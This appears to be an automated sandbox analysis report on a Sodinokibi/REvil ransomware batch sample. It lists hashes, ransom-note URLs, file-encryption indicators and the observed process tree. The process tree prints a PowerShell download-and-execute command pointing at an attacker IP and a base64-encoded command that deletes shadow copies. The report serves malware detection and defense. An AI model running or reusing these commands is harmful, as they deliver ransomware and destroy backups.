Analysis
-
max time kernel
123s -
max time network
129s -
platform
windows10_x64 -
resource
win10 -
submitted
08-08-2020 21:10
Static task
static1
Behavioral task
behavioral1
Sample
d0333bd53e654eef1380155f828b71d5.bat
Resource
win7v200722
Behavioral task
behavioral2
Sample
d0333bd53e654eef1380155f828b71d5.bat
Resource
win10
General
-
Target
d0333bd53e654eef1380155f828b71d5.bat
-
Size
219B
-
MD5
72cc00975d3f7dc5564c1a0fdbd1897b
-
SHA1
7eac1c6c294cf6a12495a484965884263cd77ff2
-
SHA256
c489438648791383b0506b31ec255a3f68b209bd6e897c5ab4cb789ffc519673
-
SHA512
9a76771f5f5e726113dca7e35c9ee71c4a2220e673c09b8fe48dd09385e1a2353d91a7002b198dbf136c03a435fa068657f6338a39f0095b148c8056cacf69e9
Malware Config
Extracted
http://185.103.242.78/pastes/d0333bd53e654eef1380155f828b71d5
Extracted
C:\61k34-readme.txt
sodinokibi
http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/B72C4F75A3359B40
http://decryptor.cc/B72C4F75A3359B40
Signatures
-
Modifies service 2 TTPs 4 IoCs
Processes:
vssvc.exedescription ioc process Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\Registry Writer vssvc.exe Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\COM+ REGDB Writer vssvc.exe Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\ASR Writer vssvc.exe Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\Shadow Copy Optimization Writer vssvc.exe -
Drops file in Program Files directory 24 IoCs
Processes:
powershell.exedescription ioc process File created \??\c:\program files\61k34-readme.txt powershell.exe File opened for modification \??\c:\program files\ClearBackup.3gp powershell.exe File opened for modification \??\c:\program files\GrantSelect.svgz powershell.exe File opened for modification \??\c:\program files\MountUninstall.wmv powershell.exe File opened for modification \??\c:\program files\PingBackup.3gp powershell.exe File opened for modification \??\c:\program files\WriteLimit.mp3 powershell.exe File opened for modification \??\c:\program files\AssertUnlock.rmi powershell.exe File opened for modification \??\c:\program files\NewFormat.mp3 powershell.exe File opened for modification \??\c:\program files\ReadImport.scf powershell.exe File opened for modification \??\c:\program files\ReadReset.vsx powershell.exe File opened for modification \??\c:\program files\RenameHide.mpv2 powershell.exe File opened for modification \??\c:\program files\ResumeExit.vsx powershell.exe File opened for modification \??\c:\program files\SwitchWatch.asp powershell.exe File opened for modification \??\c:\program files\DismountUnregister.vbe powershell.exe File opened for modification \??\c:\program files\ExpandOptimize.scf powershell.exe File opened for modification \??\c:\program files\GetAdd.tiff powershell.exe File opened for modification \??\c:\program files\MoveExpand.m4a powershell.exe File opened for modification \??\c:\program files\ReceiveStop.mhtml powershell.exe File created \??\c:\program files (x86)\61k34-readme.txt powershell.exe File opened for modification \??\c:\program files\OutSelect.tiff powershell.exe File opened for modification \??\c:\program files\ProtectBackup.htm powershell.exe File opened for modification \??\c:\program files\RemoveReceive.odp powershell.exe File opened for modification \??\c:\program files\SplitProtect.ogg powershell.exe File opened for modification \??\c:\program files\SuspendUse.svg powershell.exe -
Sets desktop wallpaper using registry 2 TTPs 1 IoCs
Processes:
powershell.exedescription ioc process Set value (str) \REGISTRY\USER\S-1-5-21-2066881839-3229799743-3576549721-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\sho4955txf08.bmp" powershell.exe -
Sodin,Sodinokibi,REvil
Ransomware with advanced anti-analysis and privilege escalation functionality.
-
Suspicious use of WriteProcessMemory 6 IoCs
Processes:
cmd.exepowershell.exedescription pid process target process PID 3820 wrote to memory of 3828 3820 cmd.exe powershell.exe PID 3820 wrote to memory of 3828 3820 cmd.exe powershell.exe PID 3820 wrote to memory of 3828 3820 cmd.exe powershell.exe PID 3828 wrote to memory of 3896 3828 powershell.exe powershell.exe PID 3828 wrote to memory of 3896 3828 powershell.exe powershell.exe PID 3828 wrote to memory of 3896 3828 powershell.exe powershell.exe -
Blacklisted process makes network request 81 IoCs
Processes:
powershell.exeflow pid process 4 3828 powershell.exe 8 3828 powershell.exe 10 3828 powershell.exe 11 3828 powershell.exe 13 3828 powershell.exe 15 3828 powershell.exe 17 3828 powershell.exe 19 3828 powershell.exe 21 3828 powershell.exe 23 3828 powershell.exe 25 3828 powershell.exe 32 3828 powershell.exe 34 3828 powershell.exe 36 3828 powershell.exe 38 3828 powershell.exe 40 3828 powershell.exe 43 3828 powershell.exe 45 3828 powershell.exe 46 3828 powershell.exe 48 3828 powershell.exe 50 3828 powershell.exe 52 3828 powershell.exe 54 3828 powershell.exe 56 3828 powershell.exe 58 3828 powershell.exe 61 3828 powershell.exe 63 3828 powershell.exe 65 3828 powershell.exe 67 3828 powershell.exe 69 3828 powershell.exe 71 3828 powershell.exe 72 3828 powershell.exe 74 3828 powershell.exe 76 3828 powershell.exe 79 3828 powershell.exe 81 3828 powershell.exe 83 3828 powershell.exe 85 3828 powershell.exe 87 3828 powershell.exe 89 3828 powershell.exe 91 3828 powershell.exe 93 3828 powershell.exe 95 3828 powershell.exe 97 3828 powershell.exe 99 3828 powershell.exe 100 3828 powershell.exe 102 3828 powershell.exe 104 3828 powershell.exe 105 3828 powershell.exe 107 3828 powershell.exe 108 3828 powershell.exe 109 3828 powershell.exe 111 3828 powershell.exe 113 3828 powershell.exe 115 3828 powershell.exe 119 3828 powershell.exe 121 3828 powershell.exe 123 3828 powershell.exe 125 3828 powershell.exe 126 3828 powershell.exe 127 3828 powershell.exe 128 3828 powershell.exe 131 3828 powershell.exe 133 3828 powershell.exe -
Enumerates connected drives 3 TTPs
-
Suspicious use of AdjustPrivilegeToken 7 IoCs
Processes:
powershell.exepowershell.exevssvc.exedescription pid process Token: SeDebugPrivilege 3828 powershell.exe Token: SeDebugPrivilege 3828 powershell.exe Token: SeDebugPrivilege 3896 powershell.exe Token: SeBackupPrivilege 3060 vssvc.exe Token: SeRestorePrivilege 3060 vssvc.exe Token: SeAuditPrivilege 3060 vssvc.exe Token: SeTakeOwnershipPrivilege 3828 powershell.exe -
Suspicious behavior: EnumeratesProcesses 8 IoCs
Processes:
powershell.exepowershell.exepid process 3828 powershell.exe 3828 powershell.exe 3828 powershell.exe 3828 powershell.exe 3828 powershell.exe 3896 powershell.exe 3896 powershell.exe 3896 powershell.exe -
Modifies extensions of user files 6 IoCs
Ransomware generally changes the extension on encrypted files.
Processes:
powershell.exedescription ioc process File renamed C:\Users\Admin\Pictures\MoveCheckpoint.tif => \??\c:\users\admin\pictures\MoveCheckpoint.tif.61k34 powershell.exe File renamed C:\Users\Admin\Pictures\RepairApprove.crw => \??\c:\users\admin\pictures\RepairApprove.crw.61k34 powershell.exe File opened for modification \??\c:\users\admin\pictures\BackupShow.tiff powershell.exe File renamed C:\Users\Admin\Pictures\BackupShow.tiff => \??\c:\users\admin\pictures\BackupShow.tiff.61k34 powershell.exe File renamed C:\Users\Admin\Pictures\ConnectBlock.png => \??\c:\users\admin\pictures\ConnectBlock.png.61k34 powershell.exe File renamed C:\Users\Admin\Pictures\InvokeRedo.crw => \??\c:\users\admin\pictures\InvokeRedo.crw.61k34 powershell.exe
Processes
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\d0333bd53e654eef1380155f828b71d5.bat"1⤵
- Suspicious use of WriteProcessMemory
PID:3820 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeC:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "IEX (New-Object System.Net.WebClient).DownloadString('http://185.103.242.78/pastes/d0333bd53e654eef1380155f828b71d5');Invoke-RCYSVVOUOPIT;Start-Sleep -s 10000"2⤵
- Drops file in Program Files directory
- Sets desktop wallpaper using registry
- Suspicious use of WriteProcessMemory
- Blacklisted process makes network request
- Suspicious use of AdjustPrivilegeToken
- Suspicious behavior: EnumeratesProcesses
- Modifies extensions of user files
PID:3828 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -e RwBlAHQALQBXAG0AaQBPAGIAagBlAGMAdAAgAFcAaQBuADMAMgBfAFMAaABhAGQAbwB3AGMAbwBwAHkAIAB8ACAARgBvAHIARQBhAGMAaAAtAE8AYgBqAGUAYwB0ACAAewAkAF8ALgBEAGUAbABlAHQAZQAoACkAOwB9AA==3⤵
- Suspicious use of AdjustPrivilegeToken
- Suspicious behavior: EnumeratesProcesses
PID:3896
-
C:\Windows\system32\vssvc.exeC:\Windows\system32\vssvc.exe1⤵
- Modifies service
- Suspicious use of AdjustPrivilegeToken
PID:3060